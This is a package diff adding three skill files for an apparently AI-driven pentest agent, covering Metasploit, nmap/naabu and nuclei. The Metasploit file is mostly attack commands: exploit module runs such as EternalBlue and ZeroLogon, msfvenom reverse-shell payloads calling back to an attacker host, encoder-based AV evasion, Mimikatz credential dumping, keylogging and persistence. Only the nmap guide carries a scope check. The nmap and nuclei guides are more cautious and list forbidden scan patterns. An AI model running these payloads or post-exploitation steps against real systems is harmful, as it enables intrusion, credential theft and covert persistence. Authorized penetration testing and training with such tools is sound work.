@aegis-scan/skills 0.4.0 → 0.5.1

package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md

@@ -0,0 +1,270 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: metasploit
+description: Metasploit Framework — module selection, msfconsole workflow, msfvenom payload generation, handlers, meterpreter post-exploitation, and common exploit modules for pentest/CTF
+---
+
+# Metasploit Framework
+
+Metasploit = exploitation framework with 2000+ modules. Use for: exploit delivery, payload generation (msfvenom), reverse shell management, and post-exploitation via Meterpreter.
+
+**Install:**
+```
+sudo apt-get install -y metasploit-framework
+# Start DB (required for search to work fast):
+sudo systemctl start postgresql
+sudo msfdb init
+```
+
+---
+
+## msfconsole Basics
+
+    # Start:
+    msfconsole
+    msfconsole -q               # Quiet mode (no banner)
+
+    # Basic commands:
+    search <keyword>            # Find modules: search ms17-010, search eternalblue
+    search type:exploit name:tomcat
+    search cve:2021-44228
+
+    use <module_path>           # Load module: use exploit/windows/smb/ms17_010_eternalblue
+    info                        # Show module details + all options
+    show options                # Show required/optional options
+    show payloads               # List compatible payloads for current module
+    show targets                # List target OS/arch options
+
+    set RHOSTS <target_ip>      # Set target
+    set RPORT <port>            # Set target port
+    set LHOST <attacker_ip>     # Set local IP for reverse shell
+    set LPORT 4444              # Set listener port
+    set PAYLOAD <payload>       # Set payload (e.g., windows/x64/meterpreter/reverse_tcp)
+
+    check                       # Check if target is vulnerable (if module supports it)
+    run                         # Execute module
+    exploit                     # Same as run
+
+    # Session management:
+    sessions -l                 # List active sessions
+    sessions -i 1               # Interact with session 1
+    background                  # Background current session (Ctrl+Z also works)
+    sessions -k 1               # Kill session 1
+
+---
+
+## Common Exploit Modules
+
+### Windows
+
+    # EternalBlue — MS17-010 (Windows 7/2008):
+    use exploit/windows/smb/ms17_010_eternalblue
+    set RHOSTS <target>
+    set PAYLOAD windows/x64/meterpreter/reverse_tcp
+    set LHOST <attacker>
+    run
+
+    # PrintNightmare — CVE-2021-1675:
+    use exploit/windows/dcerpc/cve_2021_1675_printspooler
+    set RHOSTS <target>
+    set LHOST <attacker>
+    run
+
+    # Rejetto HFS — CVE-2014-6287:
+    use exploit/windows/http/rejetto_hfs_exec
+    set RHOSTS <target>
+    set RPORT 80
+    run
+
+    # ZeroLogon — CVE-2020-1472:
+    use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
+    set RHOSTS <dc_ip>
+    set NBNAME <domain_controller_name>
+    run
+
+### Web
+
+    # Apache Struts — S2-045:
+    use exploit/multi/http/struts2_content_type_ognl
+    set RHOSTS <target>
+    set RPORT 8080
+    set LHOST <attacker>
+    run
+
+    # Tomcat Manager WAR upload:
+    use exploit/multi/http/tomcat_mgr_upload
+    set RHOSTS <target>
+    set HttpUsername tomcat
+    set HttpPassword tomcat
+    set LHOST <attacker>
+    run
+
+    # PHP CGI argument injection:
+    use exploit/multi/http/php_cgi_arg_injection
+    set RHOSTS <target>
+    run
+
+    # Jenkins Script Console RCE:
+    use exploit/multi/http/jenkins_script_console
+    set RHOSTS <target>
+    set LHOST <attacker>
+    run
+
+### Linux
+
+    # vsftpd 2.3.4 backdoor:
+    use exploit/unix/ftp/vsftpd_234_backdoor
+    set RHOSTS <target>
+    run
+
+    # Shellshock:
+    use exploit/multi/http/apache_mod_cgi_bash_env_exec
+    set RHOSTS <target>
+    set TARGETURI /cgi-bin/vulnerable.cgi
+    run
+
+### Post-Exploitation
+
+    # Dump credentials:
+    use post/windows/gather/credentials/credential_collector
+    use post/multi/recon/local_exploit_suggester
+
+    # Hashdump:
+    use post/windows/gather/hashdump
+
+---
+
+## Handlers — Receiving Reverse Shells
+
+    # Multi-handler (generic reverse shell listener):
+    use exploit/multi/handler
+    set PAYLOAD windows/x64/meterpreter/reverse_tcp
+    set LHOST <attacker>
+    set LPORT 4444
+    set ExitOnSession false     # Keep handler running after session
+    run -j                      # Run as background job
+
+    # Also accepts non-meterpreter shells:
+    set PAYLOAD linux/x64/shell/reverse_tcp
+
+---
+
+## msfvenom — Payload Generation
+
+    # List all payloads:
+    msfvenom -l payloads | grep "windows/x64"
+    msfvenom -l payloads | grep "linux/x64"
+
+    # Windows x64 reverse TCP meterpreter:
+    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell.exe
+
+    # Windows x86 (32-bit):
+    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell32.exe
+
+    # Linux ELF:
+    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f elf -o shell.elf
+    chmod +x shell.elf
+
+    # PHP webshell:
+    msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.php
+
+    # Python:
+    msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.py
+
+    # WAR (Tomcat):
+    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f war -o shell.war
+
+    # PowerShell one-liner:
+    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f psh-cmd
+
+    # Base64-encoded:
+    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe | base64
+
+    # With encoder (basic AV evasion):
+    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 \
+      -e x64/xor_dynamic -i 3 -f exe -o shell_encoded.exe
+
+---
+
+## Meterpreter Commands
+
+    # System info:
+    sysinfo                     # OS + hostname + arch
+    getuid                      # Current user
+    getpid                      # Current process ID
+    ps                          # Process list
+
+    # Privilege escalation:
+    getsystem                   # Auto privesc attempt (several techniques)
+    getprivs                    # List privileges
+    migrate <pid>               # Migrate to another process (e.g., explorer.exe)
+
+    # File operations:
+    ls                          # List directory
+    cd C:\\Users
+    pwd
+    download C:\\Users\\admin\\Desktop\\flag.txt /home/kali/
+    upload /home/kali/tool.exe C:\\Temp\\tool.exe
+
+    # Shell:
+    shell                       # Drop to cmd.exe shell
+    # Ctrl+Z = background shell back to meterpreter
+
+    # Credential extraction:
+    hashdump                    # Dump local SAM hashes
+    run post/windows/gather/credentials/credential_collector
+    load kiwi                   # Load Mimikatz module
+    creds_all                   # Dump all credentials via Kiwi/Mimikatz
+
+    # Networking:
+    ipconfig                    # Network interfaces
+    route                       # Routing table
+    portfwd add -l 3306 -p 3306 -r <internal_host>  # Port forward
+    run auxiliary/server/socks4a  # SOCKS proxy through session
+
+    # Persistence:
+    run persistence -S -U -X -i 5 -p 4444 -r <attacker>
+    # -S = startup, -U = user login, -X = system boot
+
+    # Screenshots / keylogger:
+    screenshot                  # Take screenshot
+    keyscan_start               # Start keylogger
+    keyscan_dump                # Dump keystrokes
+    keyscan_stop
+
+---
+
+## Auxiliary Modules (Scanners)
+
+    # SMB version scan:
+    use auxiliary/scanner/smb/smb_version
+    set RHOSTS 10.10.10.0/24
+    run
+
+    # HTTP version:
+    use auxiliary/scanner/http/http_version
+    set RHOSTS 10.10.10.0/24
+    run
+
+    # Credential brute force:
+    use auxiliary/scanner/ssh/ssh_login
+    set RHOSTS <target>
+    set USER_FILE users.txt
+    set PASS_FILE passwords.txt
+    run
+
+---
+
+## Pro Tips
+
+1. `search cve:XXXX-XXXXX` → fastest way to find module for a known CVE
+2. Always `set ExitOnSession false` on handler → keeps listening after first connection
+3. `migrate` to stable process (explorer.exe, svchost.exe) immediately after meterpreter session
+4. `load kiwi` + `creds_all` = Mimikatz in memory without writing to disk
+5. `run local_exploit_suggester` in meterpreter → automatic privesc enumeration
+6. `portfwd` in meterpreter = port forwarding through session without extra tools
+
+## Summary
+
+Metasploit workflow: `msfconsole` → `search` CVE/service → `use` module → `set RHOSTS/LHOST/PAYLOAD` → `check` → `run` → meterpreter: `getsystem`, `hashdump`, `load kiwi`. msfvenom: generate standalone payloads for any format (exe, elf, war, php). Multi/handler = always-on reverse shell catcher for any payload.

package/skills/offensive/airecon-fork/tools-nmap/SKILL.md

@@ -0,0 +1,211 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+# nmap & naabu — Usage Guide for AIRecon
+
+nmap and naabu are port scanners and service fingerprinters. They are infrastructure-level tools
+that answer "what is listening on this host?" — not "what vulnerability exists here?" Understanding
+the distinction is critical. Port scan results are raw data that require manual interpretation and
+correlation before any further action is taken.
+
+---
+
+## MANDATORY PRE-CONDITIONS (All must be true before using nmap or naabu)
+
+  [ ] You have confirmed the target is within scope — IP, hostname, or CIDR explicitly authorized.
+  [ ] For domain-based targets: DNS resolution has been performed and you are scanning the IP,
+      not passing a domain name to masscan (masscan requires IP addresses only).
+  [ ] You have a specific reason to port scan this host — what are you trying to learn?
+      State it: "I am scanning to determine if port 8080 is open because the JS referenced
+      an internal API on that port" — NOT "I am scanning because it is the next step."
+  [ ] output/host_profiles.json either has an entry for this host already, or you are creating
+      the entry — port scan results must be written into the host profile immediately after.
+
+Port scanning without a stated purpose is reconnaissance noise, not intelligence.
+
+---
+
+## What Port Scanning Tells You (and What It Does Not)
+
+  WHAT IT TELLS YOU:
+    - Which TCP/UDP ports are open (accepting connections)
+    - Service banners and version strings (with -sV)
+    - Operating system fingerprint (with -O, requires root)
+    - Response behavior under different probe types
+
+  WHAT IT DOES NOT TELL YOU:
+    - Whether a web application on port 8080 is vulnerable
+    - Whether a service is exploitable
+    - What the business logic of an application is
+    - Anything about authentication, authorization, or input handling
+
+  A port scan result is the BEGINNING of investigation for each discovered service.
+  It is not a vulnerability finding. It is not a reason to run an exploit scanner.
+  Every open port requires manual investigation: what is running? what version? what does it do?
+
+---
+
+## Scan Types and When to Use Each
+
+  REACHABILITY CHECK (before host profile — lightweight):
+    Purpose: Quickly confirm which hosts are alive before heavier enumeration.
+    Use: At the start, before manual profiling, to prioritize which hosts to investigate.
+    Command pattern: ping sweep or fast TCP check on common ports only.
+    Output: Feed into host prioritization — NOT into automated scanners.
+
+  TOP PORTS SCAN (during host profiling):
+    Purpose: Understand the service landscape of a specific host you are manually profiling.
+    Use: As part of STEP 3 manual profiling — one scan per host, recorded in host_profiles.json.
+    Prerequisite: You are actively profiling this host, not bulk-scanning a list.
+    Command pattern: top 1000 ports, version detection, default scripts on confirmed live host.
+
+  TARGETED SERVICE SCAN (after finding a specific open port):
+    Purpose: Deep fingerprint a specific service already discovered on a specific port.
+    Use: When a port is open and you want version, OS, and NSE script output for that service.
+    Prerequisite: The port was already found in a previous scan. You are now going deeper.
+    Command pattern: single port, full version detection, relevant NSE scripts only.
+
+  FULL PORT SCAN (when top ports reveal nothing interesting):
+    Purpose: Check all 65535 ports for unusual services on non-standard ports.
+    Use: Only after top port scan finds nothing interesting and you have a specific reason to
+    believe non-standard ports are in use (e.g., JS references to :4000, :9000, :15000).
+    Command pattern: full range, SYN scan, lower speed to avoid detection.
+
+  UDP SCAN (specific service investigation only):
+    Purpose: Detect UDP services like DNS, SNMP, NTP, TFTP.
+    Use: Only when you have a specific hypothesis about a UDP service.
+    Prerequisite: Root privileges required. Slow — do not run against all hosts.
+
+---
+
+## TWO-PASS SCANNING WORKFLOW (preferred — do not skip pass 1)
+
+  The two-pass approach avoids running -sV on all ports (slow + noisy) by first finding open ports,
+  then running service detection ONLY on those ports. Always prefer this over a single full scan.
+
+  PASS 1 — Discovery (fast, finds open ports):
+    nmap -n -Pn --top-ports 100 --open -T4 --max-retries 1 --host-timeout 90s -oN output/nmap_quick.txt <host>
+    Extract open ports: grep "^[0-9]" output/nmap_quick.txt | cut -d/ -f1 | paste -sd,
+
+  PASS 2 — Enrichment (service detection on discovered ports only):
+    nmap -n -Pn -sV -sC -p <comma_ports_from_pass1> --script-timeout 30s --host-timeout 3m -oN output/nmap_services.txt <host>
+
+  No-root fallback (when SYN scan not available):
+    nmap -n -Pn -sT --top-ports 100 --open --host-timeout 90s <host>
+
+  Prefer naabu for broad initial port discovery (faster):
+    naabu -host <host> -top-ports 1000 -silent -o output/ports.txt
+    Then feed to nmap enrichment: nmap -n -Pn -sV -sC -p $(cat output/ports.txt | grep -oP ':\K\d+' | paste -sd,) <host>
+
+---
+
+## Usage Patterns
+
+  Standard host profile scan (top ports, version detection):
+    sudo nmap -sS -sV -sC --open -p- --min-rate 1000 <host> -oA output/nmap_<host>
+
+  Fast top-1000 ports (for initial host profiling):
+    sudo nmap -sS --open --top-ports 1000 <host> -oN output/nmap_quick_<host>.txt
+
+  Targeted single-port deep scan (after discovering an interesting port):
+    sudo nmap -sV -sC -p <port> <host> --script=<relevant_script> -oN output/nmap_port<port>_<host>.txt
+
+  Full port range (only when specifically justified):
+    sudo nmap -sS -p- --min-rate 5000 <host> -oN output/nmap_fullports_<host>.txt
+
+  Light reachability check across resolved hosts (before profiling):
+    naabu -l output/resolved.txt -top-ports 1000 -o output/ports_naabu.txt
+
+  UDP scan for specific services (requires strong justification):
+    sudo nmap -sU -p 53,161,123,69 <host> -oN output/nmap_udp_<host>.txt
+
+  nrich — passive IP enrichment (no API key, uses Shodan InternetDB):
+    # After collecting IPs, enrich with known ports/CVEs/tags from Shodan InternetDB:
+    cat output/live_ips.txt | nrich -           # Enrich all IPs
+    echo "1.2.3.4" | nrich -                    # Single IP
+    cat output/live_ips.txt | nrich - -json > output/nrich_results.json
+
+    # nrich returns per-IP: open_ports, cves, cpes, tags (no active scan — purely passive lookup)
+    # Perfect complement to nmap: use nrich BEFORE active scan to pre-check known exposure
+    # Install: go install github.com/projectdiscovery/nrich/cmd/nrich@latest
+
+  NEVER use these patterns:
+    nmap -iL output/live_hosts.txt -A           (aggressive scan on unknown list, no purpose stated)
+    nmap <IP> -sV --script=vuln                 (vuln script category = automated spray, banned)
+    masscan output/live_hosts.txt               (masscan requires IPs, not hostnames)
+
+  NSE SCRIPTS — USE SELECTIVELY:
+    Default scripts (-sC) are acceptable during host profiling.
+    The "vuln" script category is FORBIDDEN — it is equivalent to running an automated vuln scanner.
+    Select specific NSE scripts only when you have a hypothesis about a specific service.
+    Example: if you found Apache Struts, use --script=http-struts2-* NOT --script=vuln.
+
+---
+
+## Interpreting Results — Mandatory Steps After Every Scan
+
+After nmap or naabu completes, for EVERY open port found:
+
+  STEP 1: Identify the service running on that port.
+    Do NOT trust the service label alone. Banner says "Apache httpd" — visit it in the browser.
+    Banner says "OpenSSH 7.4" — note the version, look up its CVE history, but do NOT auto-exploit.
+
+  STEP 2: Manually investigate the service.
+    For web ports (80, 443, 8080, 8443, 3000, 4000, 5000, etc.):
+      → browser_action: visit the port, view source, observe the application.
+    For non-web ports (SSH, FTP, SMTP, Redis, MongoDB, etc.):
+      → Manual banner grab: nc -v <host> <port> or curl telnet://<host>:<port>
+      → Identify: is this expected? is it exposed unintentionally? is it authenticated?
+
+  STEP 3: Record in host_profiles.json.
+    For each open port: { "port": N, "service": "...", "version": "...", "notes": "..." }
+    Document what you manually observed, not just what nmap guessed.
+
+  STEP 4: Form a hypothesis before taking further action.
+    "Port 6379 is open and appears to be Redis — is it authenticated? I will test with redis-cli."
+    "Port 9200 is open and appears to be Elasticsearch — is the API exposed without auth?"
+    DO NOT: "Port 9200 is open, run nuclei against it." — this is the forbidden pattern.
+
+  STEP 5: Manually verify the hypothesis.
+    Before using any automated scanner against a discovered service, manually confirm:
+    - Is it actually that service? (version banner, behavior)
+    - Is it the expected configuration or an anomaly?
+    - Is there a specific, plausible vulnerability for this version that warrants testing?
+
+---
+
+## Version Information — The Correct Follow-Up Workflow
+
+When nmap returns a specific version (e.g., "Apache Tomcat 9.0.35"):
+
+  DO:
+    1. Note the exact version string.
+    2. Manually search for known CVEs: web_search "Apache Tomcat 9.0.35 CVE"
+    3. Read the CVE description — understand what the vulnerability actually is.
+    4. Determine: is this application's usage pattern consistent with the vulnerable code path?
+    5. If yes: manually craft a targeted test or use a specific CVE template (not a generic scan).
+
+  DO NOT:
+    → Run a generic "vuln" NSE script category against it.
+    → Load the host into a vulnerability scanner "to check for CVEs."
+    → Assume the version is vulnerable without reading the CVE conditions.
+
+---
+
+## Workflow Integration (Where nmap/naabu Fit)
+
+  Phase 1 STEP 2 (Live Host Detection):
+    naabu or light nmap for reachability and common port check across resolved hosts.
+    Output: feeds into host prioritization — NOT into scanners.
+
+  Phase 1 STEP 3 (Manual Profiling):
+    Full port scan of each specific host being profiled (one at a time).
+    Output: recorded directly into output/host_profiles.json for that host.
+
+  Phase 2+ (Targeted Service Investigation):
+    Single-port deep scans on specific interesting services discovered during profiling.
+    Always followed by manual investigation of the discovered service.
+
+  NEVER:
+    Scan a list of hosts in bulk and immediately pipe results into a vulnerability scanner.
+    Use the "vuln" NSE script category at any phase.
+    Treat scan results as findings — they are starting points for manual investigation.

package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md

@@ -0,0 +1,175 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+# Nuclei — Usage Guide for AIRecon
+
+Nuclei is a template-based vulnerability scanner. It is powerful ONLY when used with the right
+context. Without knowing the target's tech stack and input surface first, nuclei produces noise —
+not findings. Treat it as a precision instrument, not a spray can.
+
+---
+
+## DECIDE FIRST: Full Recon vs Specific Task
+
+Read the user's request and apply the correct mode:
+
+  [FULL RECON] — "recon target.com", "full pentest", "bug bounty recon"
+    → All 5 pre-conditions below MUST be satisfied before nuclei.
+    → Do not shortcut. Gate is strict.
+
+  [SPECIFIC TASK] — "scan this endpoint for CVEs", "check if nginx version X is vulnerable",
+                    "test this URL for misconfigs", "I already know it's WordPress 5.9"
+    → Use the SPECIFIC TASK FAST PATH below.
+    → Skip host_profiles.json requirement if you have gathered equivalent info in this session.
+
+---
+
+## SPECIFIC TASK FAST PATH (for targeted, scoped nuclei use)
+
+When the user gives you a specific host + specific technology or vulnerability class:
+
+  You MAY run nuclei immediately if ALL of these are true:
+    [x] You know the exact target URL (not a list of unknowns)
+    [x] You know what technology/framework is running (from user, from curl headers, from JS)
+    [x] You have a specific template category or CVE ID in mind — NOT the entire template library
+    [x] You are NOT doing bulk scanning (no -l with unexamined host lists)
+
+  Example legitimate fast-path use:
+    User: "check if login.target.com Grafana is vulnerable to CVE-2021-43798"
+    → nuclei -u https://login.target.com -id CVE-2021-43798 -o output/nuclei_grafana_cve.txt
+    → No host_profiles.json required. No phase gate. Run immediately.
+
+    User: "I found /actuator/env exposed, check for Spring misconfigs"
+    → nuclei -u https://target.com/actuator -t http/misconfiguration/springboot.yaml
+    → Fine. You already have the endpoint from manual finding.
+
+  STILL FORBIDDEN even in specific task mode:
+    ✗ nuclei -l output/live_hosts.txt -t http/   (bulk + all templates)
+    ✗ nuclei -u target.com -t http/              (whole category without justification)
+    ✗ nuclei on any URL from crawler output without reading what it does first
+
+---
+
+## MANDATORY PRE-CONDITIONS (Full Recon mode only)
+
+Before nuclei can be used in a FULL RECON engagement, all must be satisfied:
+
+  [ ] The host has been manually visited in the browser — you have seen what the application does.
+  [ ] The technology stack is confirmed from observed evidence (response headers, JS, error pages).
+  [ ] At least 3 distinct endpoints have been manually probed and their behavior documented.
+  [ ] output/host_profiles.json contains a complete profile for this specific host.
+  [ ] You have selected a specific template category that matches the CONFIRMED tech stack.
+
+If any condition is unmet: do NOT use nuclei. Continue manual analysis until conditions are met.
+
+USING NUCLEI WITHOUT A HOST PROFILE IN FULL RECON MODE IS A TASK FAILURE.
+
+IF YOU ARE STUCK trying to satisfy these conditions and the user asked for a SPECIFIC TASK (not full recon), re-read "SPECIFIC TASK FAST PATH" above and proceed accordingly.
+
+---
+
+## What Nuclei Is Good At (After Manual Analysis)
+
+Once you understand the target, nuclei excels at:
+
+  - Confirming suspected misconfigurations already identified via manual observation
+  - Fingerprinting exact versions of a known framework (use technology templates)
+  - Checking for known CVEs in a framework version you have already identified
+  - Detecting blind/OOB vulnerabilities (SSRF, RCE) at specific endpoints you have already mapped
+  - Testing specific vulnerability classes against endpoints you have manually found and understood
+
+What nuclei is BAD at (and must NOT be used for):
+  - Replacing manual application understanding
+  - Discovering what an application does (that is browser + curl's job)
+  - Bulk-scanning a list of unknown hosts to "see what comes up"
+
+---
+
+## Template Selection — Context Required
+
+Template categories and their mandatory prerequisites:
+
+  TECHNOLOGY FINGERPRINTING (http/technologies/)
+    Prerequisite: You suspect a specific framework but need version confirmation.
+    Use: After manually identifying the framework from headers or JS.
+    Select: Only templates matching the confirmed framework name.
+
+  MISCONFIGURATION DETECTION (http/misconfiguration/)
+    Prerequisite: You have observed behavior suggesting a misconfiguration (e.g., directory listing,
+    exposed config endpoint, CORS wildcard in response header you read manually).
+    Use: To confirm and document a suspected misconfiguration.
+    Select: Only templates relevant to the specific misconfiguration type observed.
+
+  CVE SCANNING (http/vulnerabilities/, cves/)
+    Prerequisite: You have confirmed the exact software name AND version from real evidence.
+    Use: To check if the confirmed version is affected by specific CVEs.
+    Select: Only CVE templates for the confirmed software + version. Never run all CVE templates.
+
+  OOB / BLIND DETECTION (tags: oast, ssrf, rce)
+    Prerequisite: You have a specific endpoint or parameter that you manually identified as a
+    potential blind injection point. You have an active interactsh listener running.
+    Use: To confirm blind behavior at a SPECIFIC known endpoint — not across all URLs.
+    Select: Only templates matching the injection class you suspect at that specific endpoint.
+
+  DEFAULT CREDENTIALS / LOGIN PANELS (http/default-logins/, tags: panel)
+    Prerequisite: You have manually confirmed a login panel exists at a specific path.
+    Use: To check for default credentials on that specific panel type (e.g., confirmed Grafana login).
+    Select: Only templates for the confirmed panel software.
+
+  DNS / NETWORK / SSL (dns/, network/, ssl/)
+    Prerequisite: You have resolved hostnames and understand the infrastructure.
+    Use: For domain takeover checks on subdomains showing NXDOMAIN on CNAME targets,
+    or TLS misconfiguration checks after port scanning confirms HTTPS services.
+    Select: Appropriate category only.
+
+---
+
+## Usage Pattern (After Pre-Conditions Are Met)
+
+The correct pattern is: SPECIFIC TARGET + SPECIFIC TEMPLATES — not lists + all templates.
+
+  Targeting a single confirmed host with confirmed tech:
+    nuclei -u <specific_host> -t http/technologies/<confirmed_framework>.yaml
+
+  Targeting a specific endpoint with confirmed vulnerability class:
+    nuclei -u <specific_url_with_params> -t http/vulnerabilities/<class>/
+
+  Targeting confirmed CVE on confirmed software version:
+    nuclei -u <specific_host> -id <cve-id>
+
+  Authenticated scan on a confirmed authenticated surface:
+    nuclei -u <specific_host> -H "Authorization: Bearer <token>" -t http/misconfiguration/
+
+  Stealth mode when target shows rate limiting behavior:
+    Add: -rl 5 -c 2 -delay 3
+
+NEVER use these patterns:
+  nuclei -l output/live_hosts.txt              (no template filter, no prior analysis)
+  nuclei -l output/live_hosts.txt -t http/     (entire category on unknown hosts)
+  nuclei -l output/urls_all_deduped.txt        (raw crawler output as scanner input)
+
+---
+
+## Output and Triage
+
+  Write output: -o output/nuclei_<context>.txt  (e.g., nuclei_grafana_cve.txt)
+  For JSON output: -json -o output/nuclei_<context>.json
+
+After nuclei completes:
+  1. Read every finding manually — do NOT accept nuclei output as confirmed vulnerability.
+  2. For every finding marked [medium] or above: manually reproduce it with curl or browser.
+  3. Only escalate to create_vulnerability_report after manual verification with working PoC.
+  4. Discard informational findings unless they inform a manual attack chain.
+
+A nuclei finding is NOT a vulnerability. It is a signal that requires manual verification.
+
+---
+
+## Workflow Integration (Where Nuclei Fits)
+
+  Phase 1 (Manual Profiling): DO NOT use nuclei.
+  Phase 2 (Bespoke Expansion): Nuclei may be used ONLY for fingerprinting confirmed frameworks.
+  Phase 3+ (Logic & Auth Testing): Nuclei may support OOB blind detection at specific endpoints.
+  Phase 4+ (Vulnerability Chaining): Nuclei may confirm suspected CVEs on confirmed versions.
+
+Nuclei is a supporting instrument for hypotheses formed through manual analysis.
+It is never the primary discovery mechanism.